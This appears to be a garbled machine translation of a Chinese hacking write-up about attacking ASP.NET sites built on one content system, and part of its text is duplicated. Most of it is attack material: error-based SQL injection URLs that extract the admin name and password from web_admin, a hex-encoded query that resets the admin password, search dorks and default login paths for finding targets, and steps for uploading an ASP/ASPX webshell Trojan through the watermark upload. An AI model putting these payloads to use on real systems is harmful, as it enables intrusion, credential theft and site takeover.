Aspx? Id = 1869 "> http://www.bkjia.com/commond.aspx? Id = 1869
There is no way to union. It can only make it violent and wrong.
Administrator username: http://www.bkjia.com/commond.aspx? Id = 1869 and 1 = (select top 1 [name] from web_admin )--
Brute force Administrator Password: http://www.bkjia.com/commond.aspx? Id = 1869 and 1 = (select top 1 [pass] from web_admin )--
Single quotes are filtered. Strings can only be converted into hexadecimal values.
Update administrator password: update web_admin set
Pass = 0x31004200460041004500370042004500410043004600350036003200330041003200430042
004400450037004400450041003600340042003700430037004300
Weblogin/System_Config_Operate.aspx
Upload a watermark in the background. You can upload the watermark directly.
Webshell
Remember, never upload the ASPX horse ...... otherwise it will not succeed.
You can upload the ASP horse first, and then the ASPX horse.
The path of the Trojan is uploadFile/Picture/Trojan. asp.
Keyword: services. aspxid =
Inurl: scoreindex. aspx
Default backend address: weblogin/Login. aspx
/Weblogin/index. aspx
Copy this code domain name + code
Cart. aspx? Act = buy & id = 1 and (Select Top 1 char (124) % 2 BisNull (cast ([Name] as varchar (8000), char (32 )) % 2 Bchar (124) % 2 BisNull (cast ([Pass] as varchar (8000), char (32) % 2 Bchar (124) from (Select Top 4 [Name], [Pass] From [Web_Admin] Where 1 = 1 Order by [Name], [Pass]) T Order by [Name] desc, [Pass] desc)> 0 --
Update administrator password: update web_admin setpass = 0x310042004600410045003700420045004100430046003500360032003300410032004300420044
00450037004400450041003600340042003700430037004300
Weblogin/System_Config_Operate.aspx
Upload a watermark in the background. You can upload the watermark directly.
Webshell in the background
Remember. Do not upload the ASPX horse ...... otherwise it will not succeed.
You can upload the ASP horse first, and then the ASPX horse.
The path of the Trojan is uploadFile/Picture/Trojan. asp.
Author: black noodle nest
Fix: Compare Filter